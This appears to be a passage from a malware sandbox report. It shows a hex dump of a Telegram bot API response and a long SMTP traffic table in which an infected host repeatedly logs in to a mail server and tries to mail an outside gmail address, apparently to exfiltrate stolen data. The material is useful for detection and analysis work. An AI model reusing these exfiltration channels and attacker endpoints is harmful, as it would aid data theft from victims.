                                                                          2024-09-19 10:25:11 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12853,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                          Sep 19, 2024 12:21:35.890657902 CEST58749745208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:21:35.890930891 CEST49745587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:21:36.051333904 CEST58749745208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:21:36.052361965 CEST49745587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:21:36.216126919 CEST58749745208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:21:38.430066109 CEST58749745208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:21:38.430318117 CEST49745587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:21:38.593972921 CEST58749745208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:21:38.594217062 CEST49745587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:21:38.775335073 CEST58749745208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:21:40.297022104 CEST58761514208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:21:40.297228098 CEST61514587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:21:40.451419115 CEST58761514208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:21:40.451834917 CEST61514587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:21:40.612756014 CEST58761514208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:21:42.436367035 CEST58761514208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:21:42.440330029 CEST61514587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:21:42.599111080 CEST58761514208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:21:42.623491049 CEST61514587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:21:42.814090014 CEST58761514208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:21:44.364861965 CEST58761518208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:21:44.365026951 CEST61518587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:21:44.523714066 CEST58761518208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:21:44.523896933 CEST61518587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:21:44.698379040 CEST58761518208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:21:46.572340012 CEST58761518208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:21:46.572945118 CEST61518587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:21:46.732367039 CEST58761518208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:21:46.732692003 CEST61518587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:21:46.925723076 CEST58761518208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:21:47.309850931 CEST58761519208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:21:47.310211897 CEST61519587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:21:47.465162039 CEST58761519208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:21:47.465600967 CEST61519587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:21:47.726684093 CEST58761519208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:21:48.590116024 CEST58761521208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:21:48.590500116 CEST61521587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:21:48.746009111 CEST58761521208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:21:48.746450901 CEST61521587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:21:51.879280090 CEST58761519208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:21:52.906049013 CEST58761521208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:21:53.436779976 CEST58761519208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:21:53.439429045 CEST61519587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:21:53.595134974 CEST58761519208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:21:53.595400095 CEST61519587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:21:53.772264004 CEST58761519208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:21:54.429022074 CEST58761521208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:21:54.429301977 CEST61521587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:21:54.588046074 CEST58761521208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:21:54.588725090 CEST61521587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:21:54.764228106 CEST58761521208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:21:55.416799068 CEST58761524208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:21:55.417032957 CEST61524587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:21:55.571100950 CEST58761524208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:21:55.571357965 CEST61524587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:21:55.728704929 CEST58761524208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:21:56.401185036 CEST58761525208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:21:56.401382923 CEST61525587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:21:56.560666084 CEST58761525208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:21:56.565943956 CEST61525587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:21:56.725205898 CEST58761525208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:21:57.436943054 CEST58761524208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:21:57.437146902 CEST61524587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:21:57.592979908 CEST58761524208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:21:57.593153954 CEST61524587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:21:57.765166998 CEST58761524208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:21:58.604141951 CEST58761525208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:21:58.604597092 CEST61525587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:21:58.761923075 CEST58761525208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:21:58.762084007 CEST61525587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:21:58.940519094 CEST58761525208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:21:59.388283014 CEST58761527208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:21:59.388421059 CEST61527587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:21:59.548712969 CEST58761527208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:21:59.549084902 CEST61527587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:21:59.706248999 CEST58761527208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:00.435574055 CEST58761529208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:00.435872078 CEST61529587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:00.595698118 CEST58761529208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:00.595988035 CEST61529587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:00.754856110 CEST58761529208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:01.495095968 CEST58761527208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:01.495265007 CEST61527587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:01.651115894 CEST58761527208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:01.651247978 CEST61527587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:01.882589102 CEST58761527208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:02.571254015 CEST58761529208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:02.571573973 CEST61529587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:02.727488995 CEST58761529208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:02.727793932 CEST61529587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:02.901767015 CEST58761529208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:03.400760889 CEST58761531208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:03.401000023 CEST61531587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:03.559180021 CEST58761531208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:03.559453011 CEST61531587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:03.720530033 CEST58761531208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:04.440861940 CEST58761533208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:04.441046953 CEST61533587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:04.599482059 CEST58761533208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:04.599783897 CEST61533587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:04.761497021 CEST58761533208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:06.267630100 CEST58761531208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:06.267879963 CEST61531587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:06.268748999 CEST58761531208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:06.270240068 CEST58761531208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:06.446409941 CEST58761531208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:06.446660042 CEST61531587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:06.449114084 CEST58761533208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:06.449440002 CEST61533587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:06.610090971 CEST58761533208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:06.610260963 CEST61533587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:06.632644892 CEST58761531208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:06.794190884 CEST58761533208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:08.662761927 CEST58761536208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:08.662942886 CEST61536587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:08.663922071 CEST58761536208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:08.664061069 CEST58761536208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:08.819657087 CEST58761536208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:08.820018053 CEST61536587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:09.116108894 CEST58761536208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:09.765480042 CEST58761537208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:09.765763044 CEST61537587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:09.921050072 CEST58761537208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:09.921363115 CEST61537587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:10.079166889 CEST58761537208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:11.438726902 CEST58761536208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:11.438920975 CEST61536587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:11.595422983 CEST58761536208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:11.595679045 CEST61536587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:11.782876015 CEST58761536208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:12.444386005 CEST58761537208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:12.444637060 CEST61537587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:12.600804090 CEST58761537208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:12.601030111 CEST61537587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:12.790983915 CEST58761537208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:13.413630009 CEST58761540208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:13.413985968 CEST61540587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:13.573043108 CEST58761540208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:13.573502064 CEST61540587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:13.734548092 CEST58761540208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:14.321568966 CEST58761541208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:14.321743011 CEST61541587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:14.480807066 CEST58761541208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:14.481129885 CEST61541587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:14.638926983 CEST58761541208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:15.079889059 CEST58761540208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:15.080183983 CEST61540587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:15.239180088 CEST58761540208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:15.239635944 CEST61540587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:15.416130066 CEST58761540208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:16.447439909 CEST58761541208.91.199.223192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:16.447737932 CEST61541587192.168.2.5208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:22:16.603408098 CEST58761541208.91.199.223192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:22:16.603584051 CEST61541587192.168.2.5208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:22:16.777477026 CEST58761541208.91.199.223192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:22:17.045360088 CEST58761543208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:17.045599937 CEST61543587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:17.204201937 CEST58761543208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:17.204504967 CEST61543587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:17.365452051 CEST58761543208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:22:18.257107973 CEST58761545208.91.199.223192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:22:18.257333040 CEST61545587192.168.2.5208.91.199.223EHLO 965543
                                                                          Sep 19, 2024 12:22:18.411603928 CEST58761545208.91.199.223192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:22:18.411808014 CEST61545587192.168.2.5208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:22:18.568218946 CEST58761545208.91.199.223192.168.2.5334 UGFzc3dvcmQ6
